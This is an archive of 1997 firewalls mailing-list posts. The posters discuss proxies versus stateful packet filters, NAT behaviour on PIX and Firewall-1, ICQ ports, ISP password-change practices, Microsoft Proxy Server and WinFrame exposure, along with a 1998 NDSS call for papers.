> broken into, we're not liable"). Are you saying that mcc.net doesn't
> have one of these clauses in their agreements?
>
> Of course, one always has the recourse to discontinue doing business
> with an outsourcer at any time, including after a break-in.
>
> Curiously,
> Ian
>
>
> -----
> Ian Poynter ian@jerboa.com
> Jerboa, Inc. +1-617-492-8084
> PO Box 382648, Cambridge, MA 02238 http://www.jerboa.com
> Providing unbiased Internet consulting for businesses.
> PGP Fingerprint: BA 0C 82 C5 F2 03 3D 95 7C CE FD D3 57 4E 15 73

From owner-firewalls-outgoing Fri Jun 6 19:31:11 1997
From: Bill Stout
Date: Fri, 06 Jun 1997 16:14:41 -0700
Subject: Re: Stateful Packet Filters vs.
Proxies
To: Ryan Russell/SYBASE, Bill Stout
Cc: firewalls

At 02:03 PM 6/6/97 -0400, Ryan Russell/SYBASE wrote:
>Criticisms are welcome.

Criticisms help me complete papers also, though I haven't received many
'you're an idiot' statements about my firewall-farms 'paper' which is why
it's still v0.1. ;)
( http://www.geocities.com/researchtriangle/3372/firewall_farms.html )

>I was thinking today that I should say more about
>application-specific proxies vs. generic proxies.
>Socks is a good example of a generic proxy (at
>least I believe that is the case) and is indeed
>roughly equivalent to a packet filter, which is one
>of my points. At least you agree on that.
>
>One of the things I'd like to have to better educate
>myself is a list of proxies that do a good job of
>understanding and interacting with the protocols.

That would be the most valuable section of research done for your paper.
A list of commands supported by HTTP proxies by vendor. A list of commands
'generically' plugged through by each proxy/vendor. That would expose
which proxies fall back to generic functionality, and are as insecure as
(excuse the statement) packet filters.

With the help of the list, I hope to compile a list of intrusion tests one
can fail a packet filter/generic proxy with. The list of failures with a
packet filter should theoretically be larger than a list of failures by a
generic proxy, since a (rule passing) packet is simply passed through a
router, but is reconstructed by a gateway (proxy).

Don't hold your breath for the list, as I do work for money as well as
compile interesting lists.
;)

>But, I think my point still stands, that if you have
>more than a couple of protocols you have to
>proxy, and you want to utilize non-generic proxies,
>then you will end up using unrelated proxy software
>for some of the protocols (Your examples of
>RealAudio and SQLNet are good ones) and they will
>have different feature sets, security models, and yes,
>bugs. Translate bugs to mean potential holes or
>weaknesses.

Typically one only wants to pass traffic for which proxies exist. HTTP,
FTP, HTTPS, NNTP, RealAudio, SQLnet for example. Using the RealAudio
example, when RA first came out, there was no proxy for it (ignoring that
it was UDP for now) so most gatekeepers simply did not allow it. Good
firewalls don't use generic proxies[tm]. Just say no[propaganda plagiarism].

AFA Bugs - Considering that the MS-TCP/IP stack for example has been in
use for some time, and only recently many, many flaws have been discovered
in it, it would stand to reason that an untested proxy would also have a
few flaws as well. Admittedly poor logic, but you get my point.

>The converse of that could be: If you have n proxies
>that all understand and interact with the protocol
>in a meaningful way, and they all have 0 bugs,
>and they work exactly how you want, isn't that
>better than a layer 4 SPF? Yup.

I think you re-summarized your own paper right then.

>The above situation is a case where a SPF, as a
>unified security program, may be a better choice.
>It would be extremely difficult to pick the cutoff
>point (i.e. if you have 5 proxies, just go to SPF) given
>that you probably lose some control over the protocols
>that you had before, but are now dealing with fewer holes, etc.
>
>BTW, doesn't the proxy for SQLNet exist because the
>protocol is complex, not to increase correctness of the
>data? I.e. a non-stateful packet filter would have to leave
>too many ports "open"?
I wouldn't know, maybe an Oracle person can respond since I believe Oracle
wrote/sold the SQLnet proxy to the firewall vendors. I'll bet I can count
on my hand the number of people that really understand the SQLnet proxy.

>As for the last part of your note: I'll go back and
>re-read how I worded my conclusions, but what I mean
>to say is that generic proxies are equivalent to
>stateful packet filters.
>
>I also conclude that NAT is darn close to a generic proxy
>and a SPF, if you are using many-to-few translation
>and the NAT device doesn't allow the outside to initiate
>connections, which is probably a side-effect of most
>implementations of many-to-few NAT.

Um, an address translator does not a filter make[tm].

>Thanks for the feedback.
> Ryan
>
>
>---------- Previous Message ----------

Bill Stout

P.S. - Political question - 'American Rivers Heritage Act', related to
'Heritage areas' which monitors by satellite National parks and its
visitors, is this really giving these areas to U.N. control as claimed by
House Rep Don Young? Can't be. That's far right 'U.N. conspiracy' militia
talk. Isn't it?
http://www.reagan.com/mfcon/mike/HotTopics/document-6.5.1997.9.html

From owner-firewalls-outgoing Fri Jun 6 19:46:13 1997
From: Gabriel Dura
Reply-To: dura@geocities.com
Date: Fri, 06 Jun 1997 19:48:21 -0700
To: Pat Verner
Cc: firewalls@GreatCircle.COM
Subject: Re: ICQ and udp port 4000

Hi!

I have used ICQ for some time... It is a chat utility but unlike a normal
IRC client it is designed for direct connection between computers. The
main idea behind this product is to find someone you want very fast... I
don't think you have any other sources of information about this product
because it is very new... Also technical support is unreliable... Most of
the ppl I know use it for its user interface and its features.

About security... I think all risks from DCC are the same here... I never
heard anyone complain about security problems but all the people I know
are using it at home where security is not very important.

If there is anything I can help with I'll be glad to do it.

Regards,
Gabriel

Pat Verner wrote:
>
>
> I have just had a request to open port 4000 for outgoing UDP in order to
> support a product called ICQ.
> I must confess to being loath to open
> unnecessary udp ports, but don't want to let prejudice influence me
> unduly..
>
> Does anyone know anything about this product, and what the security
> implications would be in opening the port? Any comments would be
> appreciated.
>
> There is a blurb about ICQ on http://www.mirabilis.com/
>
> Thanks in anticipation ..
> =Pat

From owner-firewalls-outgoing Fri Jun 6 20:01:49 1997
From: bishop@cs.ucdavis.edu (Matt Bishop)
Date: Fri, 6 Jun 1997 15:05:44 -0700
To: firewalls@greatcircle.com
Subject: CFP: 1998 Symposium on Network and Distributed System Security

CALL FOR PAPERS

The Internet Society Symposium on Network and Distributed System Security

Where: San Diego, California
When: March 1998

GOAL: The symposium will foster information exchange between hardware and
software developers of network and distributed system security services.
The intended audience is those who are interested in the practical aspects
of network and distributed system security, focusing on actual system
design and implementation, rather than theory. Encouraging and enabling
the Internet community to apply, deploy, and advance the state of
available security technology is the major focus of the symposium.
Symposium proceedings will be published by the Internet Society.
Topics for the symposium include, but are not limited to, the following:

* Architectures for large-scale, heterogeneous distributed systems
* Security in malleable systems: mobile code, mobile agents, dynamic
  policy updates, etc.
* Special problems: e.g. interplay between security goals and other goals
  -- efficiency, reliability, interoperability, resource sharing, and cost.
* Integrating security services with system and application security
  facilities and with application protocols, including message handling,
  file transport, remote file access, directories, time synchronization,
  data base management, routing, voice and video multicast, network
  management, boot services, and mobile computing.
* Fundamental services: authentication, integrity, confidentiality,
  authorization, non-repudiation, and availability.
* Supporting mechanisms and APIs: key management and certification
  infrastructures, audit, and intrusion detection.
* Telecommunications security, especially for emerging technologies --
  very large systems like the Internet, high-speed systems like the
  gigabit testbeds, wireless systems, and personal communication systems.
* Controls: firewalls, packet filters, application gateways
* Object security and security objects
* Network information resources and tools such as World Wide Web (WWW),
  Gopher, Archie, and WAIS.
* Electronic commerce: payment services, fee-for-access, EDI, notary;
  endorsement, licensing, bonding, and other forms of assurance;
  intellectual property protections

GENERAL CHAIR:
  David Balenson, Trusted Information Systems

PROGRAM CHAIRS:
  Matt Bishop, University of California at Davis
  Steve Kent, BBN

PROGRAM COMMITTEE:
  Steve Bellovin, AT&T Labs -- Research
  Doug Engert, Argonne National Laboratories
  Warwick Ford, VeriSign
  Li Gong, JavaSoft
  Rich Graveman, Bellcore
  Ari Juels, RSA Laboratories
  Tom Longstaff, CERT/CC
  Doug Maughan, National Security Agency
  Dan Nessett, 3Com Corporation
  Rich Parker, NATO
  Michael Roe, Cambridge University
  Rob Rosenthal, DARPA
  Wolfgang Schneider, GMD Darmstadt
  Christoph Schuba, Purdue University
  Win Treese, Open Market, Inc.
  Jonathan Trostle, Novell
  Gene Tsudik, USC/Information Sciences Institute
  Steve Welke, Institute for Defense Analyses

LOCAL ARRANGEMENTS CHAIR:
  Thomas Hutton, San Diego Supercomputer Center

PUBLICATIONS CHAIR:
  Steve Welke, Institute for Defense Analyses

LOGISTICS CHAIR:
  Torryn Brazell, Internet Society

SUBMISSIONS:

The committee invites technical papers and panel proposals, for topics of
technical and general interest. Technical papers should be 10-20 pages in
length. Panel proposals should be two pages and should describe the topic,
identify the panel chair, explain the format of the panel, and list three
to four potential panelists. Technical papers will appear in the
proceedings. A description of each panel will appear in the proceedings,
and may, at the discretion of the panel chair, include written position
statements from each panelist.

Each submission must contain a separate title page with the type of
submission (paper or panel), the title or topic, the names of the
author(s), organizational affiliation(s), telephone and FAX numbers,
postal addresses, Internet electronic mail addresses, and must list a
single point of contact if more than one author.
The names of authors, affiliations, and other identifying information
should appear only on the separate title page.

Submissions must be received by 1 August 1997, and should be made via
electronic mail in either PostScript or ASCII format. If the committee is
unable to print a PostScript submission, it will be returned and hardcopy
requested. Therefore, PostScript submissions should arrive well before
1 August. If electronic submission is difficult, submissions should be
sent via postal mail.

All submissions and program related correspondence (only) should be
directed to the program chair:

  Matt Bishop
  Department of Computer Science
  University of California at Davis
  Davis CA 95616-8562
  Email: sndss98-submissions@cs.ucdavis.edu
  Phone: +1 (916) 752-8060
  FAX: +1 (916) 752-4767

Dates, final call for papers, advance program, and registration
information will be available at the URL:
http://www.isoc.org/conferences/ndss98.

Each submission will be acknowledged by e-mail. If acknowledgment is not
received within seven days, please contact the program chair as indicated
above.

Authors and panelists will be notified of acceptance by 1 October 1997.
Instructions for preparing camera-ready copy for the proceedings will be
sent at that time. The camera-ready copy must be received by
1 November 1997.
From owner-firewalls-outgoing Fri Jun 6 20:31:39 1997
From: "Kelly E. Gibbs"
Date: Fri, 6 Jun 1997 18:43:49 -0700 (PDT)
To: firewalls@greatcircle.com
Subject: PIX Question...

Is it fair to assume that PIX does not alter data content, for example, if
I FTP to another host through 2 pix boxes, the FTP PORT command would
reveal the IP address - correct?
10.10.2.2 ---> 10.20.2.1 |-| 10.20.3.1 ------> 10.10.3.3
                  PIX             PIX

From owner-firewalls-outgoing Fri Jun 6 20:46:12 1997
From: "Norman Widders"
Organization: WCE Consulting
Date: Sat, 7 Jun 1997 12:45:43 +1000 GMT
Subject: RE: ISP Connection

A certain ISP has set it so you can not change your password using the
passwd command. One has to make a phone call to them every time you want
to change it. My concern is what is there to prevent eavesdropping when
saying the password over the telephone.

Do any other ISPs practice this worrying method? What do you think, is
this a safe practice for the ISP to be employing?
--
+----------------------------------------------------------+
| #include                                                 |
|                                                          |
| E-MAIL: winspace@geko.net.au                             |
| HOMEPAGE: http://www.geocities.com/ResearchTriangle/4431 |
|                                                          |
+----------------------------------------------------------+

From owner-firewalls-outgoing Fri Jun 6 21:01:15 1997
From: Bill Husler
Date: Fri, 6 Jun 97 11:34:09 -0500
To: "Raymond Sleiman", "fw-1-mailinglist@us.checkpoint.com", "firewalls@GreatCircle.COM"
Subject: Re: [FW1] Address Translation with Firewall 2.1 on Solaris 2.5.1

I believe NAT will not take effect until the next Policy Install.

Bill

As previously stated by Raymond Sleiman
>Hello,
>I defined address translation on a firewall gateway as follows:
>
>193.246.62.140 193.246.62.140 DST_STATIC 195.176.150.10
>195.176.150.10 195.176.150.10 SRC_STATIC 193.246.62.140
>
>I add with arp -s 195.176.150.10 ethernet_address of the machine
>193.246.62.10 PUB.
>I also defined static routes to 193.246.62.140 using the internal
>interface of the firewall.
>route add 195.176.150.10 Ipaddress of the internal interface 193.246.62.2
>
>The internal interface has 193.246.62.2 as IP address.
>The external interface has 195.176.150.2 as IP address. This address is a
>registered address.
>
>The class 195.176.150.0 is a registered class.
>The class 193.246.62.0 is not a registered address.
>Addresses are samples and not reality.
>
>The problem: I am not able to ping the translated address 195.176.150.10
>from the Internet, from the inside, and from the gateway itself.
>
>Could someone tell me what is wrong?
>
>Another question: where should we define address translation?
>How to load the address translation table (xlate.conf)? Do we have to
>launch a command to load the address translation configuration?
>
>Are the static routes correct?
>Best regards
>Raymond Sleiman
>

Please remember to always flame via private eMail - the rest of the group
is just not interested.

From owner-firewalls-outgoing Fri Jun 6 21:16:23 1997
From: Chris Lonvick
Date: Fri, 06 Jun 1997 23:07:38 -0500
To: "Kelly E. Gibbs", firewalls@GreatCircle.COM
Subject: Re: PIX Question...

Hi Kelly,

The PIX conforms to RFC-1631. The big example that they give in that RFC
is the case of ftp. There are some ftp commands that embed the IP address
into the payload, just like you noted.
The PIX (like most other NAT devices - and actually I can't think of any
that don't) will actually look into the payload and convert the
appropriate addresses it finds there. And, like the RFC says, the IP and
TCP checksums will need to be recalculated before it can be forwarded.
The RFC also mentions ICMP as another protocol that will require checking
for addresses embedded in the payload.

Since that time, there have been a lot of protocols which also embed some
of the IP or TCP header information into the payload. This is the
challenge of all NAT engineers; to keep up with the new protocols and make
sure that they work through the NATificator. And actually (since I'm
thinking about it and I still have a glug of beer left in the bottle), the
PIX engineers told me that RFC-1001/1002 NetBIOS/TCP/IP has the IP
addresses embedded in various frames at mobile places. Yech.

In your example, the right PIX would convert the IP source address in the
IP header as well as any occurrences of the source address in the payload
for outgoing frames. The left PIX would convert the destination IP address
as well as any occurrences of that in the payload for incoming packets.
As long as the PIXen maintain translation tables, the session will be
built between the two end stations. (And, in fact, this will be just the
same for any other NATificators.)

Hope this helps,
Chris Lonvick
Cisco Systems
Consulting Engineering
Houston, TX, USA
+1.713.778.5663

At 06:43 PM 6/6/97 -0700, Kelly E. Gibbs wrote:
>
>Is it fair to assume that PIX does not alter data content, for example, if
>I FTP to another host through 2 pix boxes, the FTP PORT command would
>reveal the IP address - correct?
>
>
> 10.10.2.2 ---> 10.20.2.1 |-| 10.20.3.1 ------> 10.10.3.3
>                   PIX             PIX
>

From owner-firewalls-outgoing Fri Jun 6 21:28:49 1997
From: Ryan Russell/SYBASE
Date: 6 Jun 97 20:04:23 EDT
To: "Kelly E. Gibbs"
Cc: Ryan Russell/SYBASE, Bill Stout, firewalls
Subject: Re: Stateful Packet Filters vs. Proxies

Well, the NAT I'm talking about specifically (IP NAT products like the
ones from Checkpoint and Cisco, and probably others) work at layer 4. They
need to understand TCP and so forth. One could write one that works
strictly at layer 3, but for many IP protocols it wouldn't work very well,
and certainly wouldn't work for many-to-few NAT implementations.

Anything above layer 4 would probably be called an application gateway, or
maybe a proxy :)

Layer 2 NAT implementations would probably be called translational
bridges.
I can't think of a layer 1 standard that includes anything one could call
an address...

Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: stoutb, firewalls
From: kgibbs @ best.com ("Kelly E. Gibbs") @ smtp
Date: 06/06/97 06:51:55 PM
Subject: Re: Stateful Packet Filters vs. Proxies

At what level does the NAT occur in the OSI model? So far I've heard 2 and
4... what's the right answer?

On 6 Jun 1997, Ryan Russell/SYBASE wrote:

> Criticisms are welcome.
>
> I was thinking today that I should say more about
> application-specific proxies vs. generic proxies.
> Socks is a good example of a generic proxy (at
> least I believe that is the case) and is indeed
> roughly equivalent to a packet filter, which is one
> of my points. At least you agree on that.
>
> One of the things I'd like to have to better educate
> myself is a list of proxies that do a good job of
> understanding and interacting with the protocols.
>
> But, I think my point still stands, that if you have
> more than a couple of protocols you have to
> proxy, and you want to utilize non-generic proxies,
> then you will end up using unrelated proxy software
> for some of the protocols (Your examples of
> RealAudio and SQLNet are good ones) and they will
> have different feature sets, security models, and yes,
> bugs. Translate bugs to mean potential holes or
> weaknesses.
>
> The converse of that could be: If you have n proxies
> that all understand and interact with the protocol
> in a meaningful way, and they all have 0 bugs,
> and they work exactly how you want, isn't that
> better than a layer 4 SPF? Yup.
>
> The above situation is a case where a SPF, as a
> unified security program, may be a better choice.
> It would be extremely difficult to pick the cutoff
> point (i.e. if you have 5 proxies, just go to SPF) given
> that you probably lose some control over the protocols
> that you had before, but are now dealing with fewer holes, etc.
>
> BTW, doesn't the proxy for SQLNet exist because the
> protocol is complex, not to increase correctness of the
> data? I.e. a non-stateful packet filter would have to leave
> too many ports "open"?
>
> As for the last part of your note: I'll go back and
> re-read how I worded my conclusions, but what I mean
> to say is that generic proxies are equivalent to
> stateful packet filters.
>
> I also conclude that NAT is darn close to a generic proxy
> and a SPF, if you are using many-to-few translation
> and the NAT device doesn't allow the outside to initiate
> connections, which is probably a side-effect of most
> implementations of many-to-few NAT.
>
> Thanks for the feedback.
> Ryan
>
>
> ---------- Previous Message ----------
> To: Ryan.Russell, firewalls
> cc:
> From: stoutb@pios.com (Bill Stout) @ smtp
> Date: 06/06/97 11:15:43 AM
> Subject: Re: Stateful Packet Filters vs. Proxies
>
> Forgive my criticisms:
>
> The paper is founded on some incorrect assumptions.
>
> It groups application specific proxies with generic proxies. Generic or
> 'plug-gw' proxies are not desirable because they don't filter application
> commands, and are viewed as nearly as weak as packet filtering. Application
> specific proxies are aware (to varying levels) of application commands.
>
> A proxy server typically comprises application specific proxies, and does
> not comprise only generic proxies. Generic proxies are avoided at all
> costs, at least until management wants 'something added'. Occasionally
> generic proxies are used as a last resort, then replaced; for example,
> RealAudio and SQLnet were initially filtered with plug-gw proxies until
> application (RealAudio/SQLnet) specific proxies were released.
>
> The paper then continues to compare generic proxy functions with packet
> filters and concludes they are the same. A discussion on NAT ensues which
> is not an equivalent technology to either.
> > Bill Stout > > At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote: > >Well, I finally got around to writing down my arguments > >on the above subject. Check it out at: > > > >http://futon.sfsu.edu/~rrussell/spfvprox.htm > > > >Warning: It's lengthy. > > > >Comments welcome. > > > > Ryan > > > _____________________________________________________________________________ > Bill Stout (Systems Engineer/Consultant) stoutb@pios.com > Pioneer Standard (Computer Systems & Components) http://www.pios.com/ > San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 > *My opinions do not reflect that of the company, and visa-versa, thankfully.* > > > > > From owner-firewalls-outgoing Fri Jun 6 23:31:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA29233 for firewalls-outgoing; Fri, 6 Jun 1997 23:15:35 -0700 (PDT) Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA29223 for ; Fri, 6 Jun 1997 23:15:26 -0700 (PDT) Received: (from sjg@localhost) by zen.quick.com.au (8.8.5/8.7.3) id QAA25566; Sat, 7 Jun 1997 16:19:41 +1000 (EST) Date: Sat, 7 Jun 1997 16:19:41 +1000 (EST) From: "Simon J. Gerraty" Message-Id: <199706070619.QAA25566@zen.quick.com.au> To: Ryan Russell/SYBASE Cc: firewalls@greatcircle.com Subject: Re: Stateful Packet Filters vs. Proxies References: <199706060722.AAA16788@notesgw2.sybase.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ryan Russell writes: >Well, I finally got around to writing down my arguments >on the above subject. Check it out at: >>I hope to convince the reader, to whatever degree I can, of the following: >> 1.Proxies are a special case of a SPF. >> 2.SPFs can be the more secure choice depending on the requirements. >> 3.Network address translation (NAT) can be considered a form of >> security on it's own. One thing to note - SPF and crypto do not mix. 
I saw a case last week where users behind a PIX firewall could not use an encrypted FTP, because the PIX box could not inspect the content of PORT commands and allow the data ports to be connected to.

Solutions are:

1. Use passive mode transfers.
2. Turn off the filtering in the PIX :-)
3. Do without crypto :-)

1 is obviously preferable if both sides can handle it - not always the case. The other two are not attractive at all. If they'd been using a proxy, they would not have had a problem.

--sjg
--
Simon J. Gerraty

#include /* imagine something _very_ witty here */

From owner-firewalls-outgoing Sat Jun 7 01:06:50 1997
Date: Sat, 07 Jun 1997 15:51:30 +0800
From: Wong
Organization: CSNet
To: firewalls@greatcircle.com
Subject: [Fwd: Re: Microsoft Proxy Server]

Date: Fri, 6 Jun 1997 10:48:17 +0100
To: Wong
From: Simon Foley
Subject: Re: Microsoft Proxy Server

In article <33956691.57F6@pdx.com.my>, Wong writes

Hi, I'm sorry to mail this response to you but, I have never been able to get a posting through to this news group. If you wish to post it for me that would be appreciated!

Your message follows:

Date: Fri, 6 Jun 1997 10:33:52 +0100
To: muc-lists-firewalls@moderators.uu.net
From: Simon Foley
Newsgroups: muc.lists.firewalls
Subject: Re: Microsoft Proxy Server
Organization: Eric Cantona Is God

In article <33956691.57F6@pdx.com.my>, Wong writes

Just thought I would add my two pence worth, and I use MSProxy!

>> Remote Administration via Internet Service Manager allows Microsoft Proxy
>> Server to be managed from any Windows NT system on the network.
>>

Correct me if I am wrong but if you use the http administration utility, the passwords are transported in *ENCODED* *CLEAR TEXT* authentication and hence you would be mad to administer the proxy via this method. However I do not know whether this administration can occur through the internet side of the server. It would be a major breach of security if it was! I suspect this will only be the case if you were allowing web publishing on the same server, ie allowing listening on port 80. *NOT* a good thing to do at all. Any bugger on the internet would be able to try to logon as an administrator!!!!!!!! One would hope MS would have denied this service to ips in the proxy's LAT, but they seem to be hinting in their so-called "security" manual that this is a risk, but do not specify whether this is just for normal proxy usage or also the administration service. Anybody any ideas?

>> Integrates with NT network security domain model - Microsoft Proxy Server
>> extensively leverages the network-based Windows NT domain security model to
>> manage access permission and logging.
>>
>You must use "Trust" to connect those domains together. And, the "Trust"
>can be compromised to make the NT trust anybody. Sounds scary . . . .!
>>

Well to be more specific you can make the trust one way as in DomainLAN is "Trusted" by DomainProxy but DomainProxy is not "Trusted" by DomainLAN. The issue then becomes one of how secure is the trusting implementation in NT. You would have to work for MS to find out as they give bugger all information out!

>> Massive Scalability - Microsoft Proxy Server's cache is limited only by
>> Windows NT Server system resources.
>>
>Can NT scale up to 64 processors, like the SUN servers? Or 12
>processors, like the Alpha servers.
>>

Yes, the NT box makes a nice stand to put your Sun and Alpha servers on :-)

Does anybody know whether MS Proxy uses the RPC service on the NT box. I am interested on the ports you would have to open to administer and establish trust to a proxy on the other side of a firewall. MS say nothing of any help! Ever called connections? My sister knows more about these issues than every MS bod I have ever talked to there!

laters
simon
--
Simon Foley

From owner-firewalls-outgoing Sat Jun 7 03:46:10 1997
Date: Sat, 7 Jun 1997 06:47:29 -0400 (EDT)
From: Nick Simicich
To: Norman Widders
cc: firewalls@GreatCircle.COM
Subject: RE: ISP Connection

On Sat, 7 Jun 1997, Norman Widders wrote:

> One has to make a phone call to them every time you want to
> change it. My concern is what is there to prevent eavesdropping
> when saying the password over the telephone. Do any other
> ISP's practice this worrying method ?
>
> What do you think, is this a safe practice for the ISP
> to be employing ?

Do you think it is more likely that someone will sniff your session when you change your password, or tap your telephone? I think that the risks are more or less comparable.

Of course my password is the same as my pet's name. My macaw's name was Q47pY!3, but I change it every 90 days.

Nick Simicich mailto:njs@scifi.squawk.com or (last choice) mailto:njs@us.ibm.com
http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!
From owner-firewalls-outgoing Sat Jun 7 05:31:10 1997
Date: Sat, 07 Jun 1997 08:27:09 -0400
From: Mariko Yashada
To: winspace@geko.net.au
CC: firewalls@GreatCircle.COM
Subject: Re: ISP Connection

No, this is not a good practice.

For a while we had to give the ISP the user id and password for a new user. We insisted, then threatened to go to another ISP if they didn't come up with a way for users to change their passwords. They now have a password change page at their site.

We now issue a generic password to new users. They then change the password as part of their training class. We also have the ISP expire existing passwords every 90 days.

I know there are holes in the password change procedure since the information goes across in the clear, but it's better than having a group of internal people knowing everyone's ISP password.

Mariko

Norman Widders wrote:

> A certain ISP has set it so you can not change your password
> using the passwd command.
>
> One has to make a phone call to them every time you want to
> change it. My concern is what is there to prevent eavesdropping
> when saying the password over the telephone. Do any other
> ISP's practice this worrying method ?
>
> What do you think, is this a safe practice for the ISP
> to be employing ?
>
> --
> +--------------------------------------------------------------+
> | #include                                                     |
> |                                                              |
> | E-MAIL: winspace@geko.net.au                                 |
> | HOMEPAGE: http://www.geocities.com/ResearchTriangle/4431     |
> |                                                              |
> +--------------------------------------------------------------+

From owner-firewalls-outgoing Sat Jun 7 06:46:18 1997
Date: Sat, 07 Jun 1997 08:41:28 -0500
To: "Simon J. Gerraty", Ryan Russell/SYBASE
From: Chris Lonvick
Subject: Re: Stateful Packet Filters vs. Proxies
Cc: firewalls@GreatCircle.COM

Hello Simon,

I think that you meant to say that Crypto and NAT do not mix. That's always been the case with all types of NATificating firewalls, whether they be proxies or stateful packet filters. This has long been recognized as a problem and was even identified in the first group of IPSEC RFCs.

When you're using the Transport Mode encryption as described in 1827, only the payload is encrypted and the header is the actual header as it would normally be sent from the device. When this passes the NATificator, only the header addresses can be translated. Any information embedded in the payload cannot be identified by the NATificator, and therefore cannot be translated.
So, in your case, the header was probably translated but the embedded addresses in the payload were not. This would certainly cause confusion with the process and would not allow the session to complete.

The workaround (I think that it's identified in 1825) is to use AH between the workstation and the NATificating firewall, and then let the firewall perform ESP. In this way, the payload is protected by the hash in the AH before it reaches the firewall. The firewall will then perform the ESP to provide confidentiality as it crosses an untrusted network (i.e. the Internet). At this time, however, the PIX does not work that way, and I can't think of any firewalls (of any type) that do.

If you use NAT and Crypto together, the proxy firewall would have to know the session keys to be able to decrypt the payload so that it could

1 - identify the session type (telnet, ftp, http, etc.)
2 - NAT any header information contained in the payload

The proxy would then have to re-encrypt the packet and send it along its merry way. This, besides being exceptionally computationally intensive, is a bad idea since keys should only be exchanged between the endpoints. I actually haven't heard of any firewall device which does this. I think that the firewalls that do perform this just provide a stateful forwarding process to deal with AH/ESP-transport mode sessions which connect an internal device to an external device. If anyone knows differently, please respond back to the list.

Try running your test again without NAT. I expect that it will work since the header information will always agree with any embedded information and the PIX (or any other type of firewall) will not have to muck around with address translation.

Hope this helps,
Chris Lonvick
Cisco Systems Consulting Engineering
Houston, TX, USA
+1.713.778.5663

At 04:19 PM 6/7/97 +1000, Simon J. Gerraty wrote:
>Ryan Russell writes:
>>Well, I finally got around to writing down my arguments
>>on the above subject. Check it out at:
>
>>>I hope to convince the reader, to whatever degree I can, of the following:
>>> 1.Proxies are a special case of a SPF.
>>> 2.SPFs can be the more secure choice depending on the requirements.
>>> 3.Network address translation (NAT) can be considered a form of
>>> security on its own.
>
>One thing to note - SPF and crypto do not mix.
>
>I saw a case last week where users behind a PIX firewall could not use
>an encrypted FTP, because the PIX box could not inspect the content of
>PORT commands and allow the data ports to be connected to.
>
>Solutions are:
>
>1. Use passive mode transfers.
>2. Turn off the filtering in the PIX :-)
>3. Do without crypto :-)
>
>1 is obviously preferable if both sides can handle it - not always the
>case. The other two are not attractive at all. If they'd been using
>a proxy, they would not have had a problem.
>
>--sjg
>--
>Simon J. Gerraty
>
>#include /* imagine something _very_ witty here */

From owner-firewalls-outgoing Sat Jun 7 07:16:18 1997
To: Chris Lonvick
cc: "Simon J. Gerraty", Ryan Russell/SYBASE, firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies
Date: Sun, 08 Jun 1997 00:08:13 +1000
From: "Simon J. Gerraty"

Chris,

Thanks for the info.

> I think that you meant to say that Crypto and NAT do not mix.

I guess that's true too, but no, I really meant what I said...

> actual header as it would normally be sent from the device. When this
> passes the NATificator, only the header addresses can be translated.
> Any information embedded in the payload cannot be identified by the
> NATificator, and therefore cannot be translated. So, in your case, the

Correct, and this was indeed a problem. However I was able to configure my ftp proxy to ignore the address part of the PORT command and just use the port number - thus working around the NAT problem.

[BTW, the ftp sessions we are talking about are outbound through their PIX f/w and in-bound through my proxy based f/w - hence my requirement for crypto.]

They still could not get a data session going because the PIX was blocking the inbound data connections - we presume because it had not seen the port in the PORT command and therefore not opened a window of opportunity...

If the above assumption is correct - and the folk who ran the PIX thought it was, then even with NAT turned off, the encrypted FTP was never going to work.

So we get back to SPF and crypto don't mix :-)

--sjg

From owner-firewalls-outgoing Sat Jun 7 09:01:14 1997
From: long-morrow@CS.YALE.EDU
Date: Sat, 7 Jun 1997 11:54:42 -0400 (EDT)
To: firewalls@GreatCircle.COM, gaarder@actech.com, kgunther@nassau.cv.net
Subject: Re: Does Winframe need a firewall?

Steven Gaarder writes

>Ken Gunther writes:
> > Is Winframe safe to put directly on the untrusted network? We are worried
> > about unauthorized people getting through to the trusted side as well as
> > denial of service attacks where people try to crash Winframe.
> > Ken (kgunther@nassau.cv.net)
>
>I'd treat it like any other NT box, which is to say that *I* wouldn't
>put it directly on an untrusted net. If all you want to do is provide
>Winframe, one approach would be to put a second ethernet card in the
>machine and connect it to the untrusted network through a filtering
>router, letting only the ICA port through.

I'd be real cautious about allowing Internet access to a Citrix WinFrame server running either on the safe secure internal network or in the DMZ/perimeter net or straddling both.
This is because if the remote ICA client app has access to running a winsock app on the server machine it then has the ability to appear to have an IP address on your local network -- which will often get it access that you do not intend.

I've played around a bit with Insignia's NTrigue (a modified NT 3.51 server with Citrix code -- a 4.0 server should soon be available) and had no problems running the win32 telnet, ftp, Internet Explorer, etc from remote Mac ICA clients and Unix X windows machines.

I'd definitely recommend removing telnet, ftp, IE and any other winsock apps from any machine you are going to use as a WinFrame server exposed to the Internet so as to prevent "island-hopping" attacks.

- H. Morrow Long, Yale Univ. IT Information Security

From owner-firewalls-outgoing Sat Jun 7 09:31:22 1997
From: "Jamie Thain"
To: "Kelly E. Gibbs", "Ryan Russell/SYBASE"
Cc: "Bill Stout", "firewalls"
Subject: Re: Stateful Packet Filters vs. Proxies
Date: Sat, 7 Jun 1997 13:24:18 -0300

Kelly,

I would think a NAT works at layer 3. It cannot be 4, as that is where TCP/UDP resides and a NAT works on IP address (at least firewall-1's).

Layer three is described in part as...

Finding a route between a source and a destination node or between two intermediate devices.

The Network Press, Encyclopedia of Networking, Pg 753 (OSI Models)

regards:jamie

From owner-firewalls-outgoing Sat Jun 7 09:46:15 1997
From: "Jamie Thain"
To: , "Ken Gunther"
Subject: Re: Does Winframe need a firewall? -- Winframe Proxy
Date: Sat, 7 Jun 1997 13:44:21 -0300

Ken,

I would suggest using a Firewall for the citrix.

Did you try to turn up the speed on your linux? Moving to a Pentium Pro with 64 Mb of RAM, and fast PCI network cards should fix the latency problem. Also if you check on the Citrix site there is a FAQ on how to increase the key response time on TCP/IP. If you can't find it you can send me an email privately and I will send it to you.

The issue with the Citrix is not so much the Winframe itself, as the other ports the NT box would leave open.

Obviously you could also put up a Winframe Proxy (another Winframe Server) and have a second logon to the second winframe from the first over some non-TCP/IP and make the external Winframe the patsy. But users tend to find this clumsy...

regards:jamie
